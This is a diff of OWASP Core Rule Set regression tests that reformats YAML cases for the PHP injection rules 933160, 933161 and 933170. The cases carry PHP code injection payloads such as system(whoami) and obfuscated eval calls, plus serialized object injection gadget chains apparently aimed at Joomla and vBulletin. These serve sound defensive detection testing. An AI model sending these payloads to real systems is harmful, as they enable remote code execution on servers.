933160-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 17 desc: | PHP function call in URI payload: substr() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/substr()" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/substr()" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 18 desc: | PHP function call in URI, using mixed case payload: subSTR($x) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/subSTR%28%24x%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/subSTR%28%24x%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 19 desc: | PHP function call in URI with concatenated string/functions payload: eval(chr(112).chr(104).chr(112)) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 20 desc: | PHP function call in URI payload: eval(gzinflate(str_rot13(base64_decode("") stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: '/get/eval(gzinflate(str_rot13(base64_decode("")' - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: '/get/eval(gzinflate(str_rot13(base64_decode("")' + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 21 desc: | PHP function call in URI, base64 encoded payload: payload: /eval(base64_decode('cGFwYWRhcHVwaSwK') stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/eval%28base64_decode%28%27cGFwYWRhcHVwaSwK%27%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/eval%28base64_decode%28%27cGFwYWRhcHVwaSwK%27%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 22 desc: | PHP function call in body payload: eval("echo 10000000000-245205634;") stages: - - stage: - input: - data: yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-23 + - input: + data: yt=eval%28%22echo+10000000000%2d245205634%3b%22%29%3b + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 23 desc: | PHP function call in body, mixed case payload: eVAl("echo 10000000000-245205634;") stages: - - stage: - input: - data: yt=eVAl%28%22echo+10000000000%2d245205634%3b%22%29%3b - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-24 + - input: + data: yt=eVAl%28%22echo+10000000000%2d245205634%3b%22%29%3b + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 24 desc: string function call stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=return%22system%22%28xyz%29.s" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=return%22system%22%28xyz%29.s" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 25 desc: | PHP function call payload: system(whoami) stages: - - stage: - input: - data: cmd=system(whoami) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-26 + - input: + data: cmd=system(whoami) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 26 desc: | PHP function call payload: (system)(whoami) stages: - - stage: - input: - data: cmd=(system)(whoami) - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-27 + - input: + data: cmd=(system)(whoami) + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 27 desc: | PHP function system call in single quotes and parentheses payload: ('system')('whoami') stages: - - stage: - input: - data: cmd=('system')('whoami') - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-28 + - input: + data: cmd=('system')('whoami') + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 28 desc: | PHP system call in double quotes and parentheses payload: ("system")("whoami") stages: - - stage: - input: - data: cmd=("system")("whoami") - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-29 + - input: + data: cmd=("system")("whoami") + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 29 desc: | PHP system call in double quotes and parentheses, multiple spaces after command payload: ("system ")("whoami") stages: - - stage: - input: - data: cmd=("system ")("whoami") - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-30 + - input: + data: cmd=("system ")("whoami") + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 30 desc: | PHP string function call payload: return"system"(xyz).s stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=return%22system%22%28xyz%29.s" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=return%22system%22%28xyz%29.s" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 31 desc: | False Positive test, missing mandatory parenthesis payload: /eval( stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/eval(" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/eval(" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 32 desc: | False Positive test, missing mandatory parenthesis payload: eval stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=eval" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=eval" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 33 desc: | False Positive test payload: the files (yep) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20files%20%28yep%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933160" - - test_title: 933160-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20files%20%28yep%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 34 desc: | PHP mixed case function call with space, LF between (). payload: assert_OptionS (\n\n) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=assert_OptionS%20%28%0A%0A%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=assert_OptionS%20%28%0A%0A%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 35 desc: | PHP function call `filegroup` with multiple whitespaces. payload: filegroup (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=filegroup%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=filegroup%20%20%28blah%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 36 desc: | PHP function call in URI payload: unpack() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/unpack()" - version: "HTTP/1.1" - output: - log_contains: id "933160" - - test_title: 933160-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/unpack()" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 37 desc: | PHP function call in URI, using mixed case payload: unPACK($x) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/unPACK%28%24x%29" - version: "HTTP/1.1" - output: - log_contains: id "933160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/unPACK%28%24x%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml index 8c12ac72f..fe5ac6247 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml @@ -1,93 +1,92 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 933161.yaml +rule_id: 933161 tests: - - test_title: 933161-1 + - test_id: 1 desc: regexp; must run test in PL3! stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20checkDate%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" - - test_title: 933161-2 + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20checkDate%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933161] + - test_id: 2 desc: regexp; must run test in PL3! stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=chroot%09%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" - - test_title: 933161-3 + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=chroot%09%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933161] + - test_id: 3 desc: symlink \t() stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=symlink%09%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933161" + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=symlink%09%28%29" + version: "HTTP/1.1" + output: + log: + expect_ids: [933161] + # See https://github.com/coreruleset/coreruleset/issues/3693 # See https://github.com/coreruleset/coreruleset/pull/3273#issuecomment-1675490075 - # - test_title: 933161-4 + # - test_id: 4 # desc: dl/*foo*/() # stages: - # - stage: - # input: - # data: gethostbynamE( - # dest_addr: 127.0.0.1 - # headers: - # Host: localhost - # User-Agent: "OWASP CRS test agent" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # method: POST - # port: 80 - # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29" - # version: "HTTP/1.1" - # output: - # log_contains: id "933161" - - test_title: 933161-5 + # - input: + # data: gethostbynamE( + # dest_addr: 127.0.0.1 + # headers: + # Host: localhost + # User-Agent: "OWASP CRS test agent" + # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # method: POST + # port: 80 + # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29" + # version: "HTTP/1.1" + # output: + # log: + # expect_ids: [933161] + - test_id: 5 desc: ucfirst() stages: - - stage: - input: - data: gethostbynamE( - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?foo=xucfirst%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933161" + - input: + data: gethostbynamE( + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?foo=xucfirst%28%29" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933161] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml index 9dd5a73be..0587a2cd0 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml @@ -1,175 +1,173 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 933170.yaml +rule_id: 933170 tests: - - test_title: 933170-1 + - test_id: 1 desc: PHP object injection stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get/serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get/serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 2 desc: PHP object injection stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get/serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get/serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 3 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize2" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-4 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize2" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 4 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-5 + - input: + data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D" + version: "HTTP/1.1" + output: + log: + expect_ids: [933170] + - test_id: 5 desc: PHP object injection stages: - - stage: - input: - data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D" - version: "HTTP/1.1" - output: - log_contains: id "933170" - - test_title: 933170-6 + 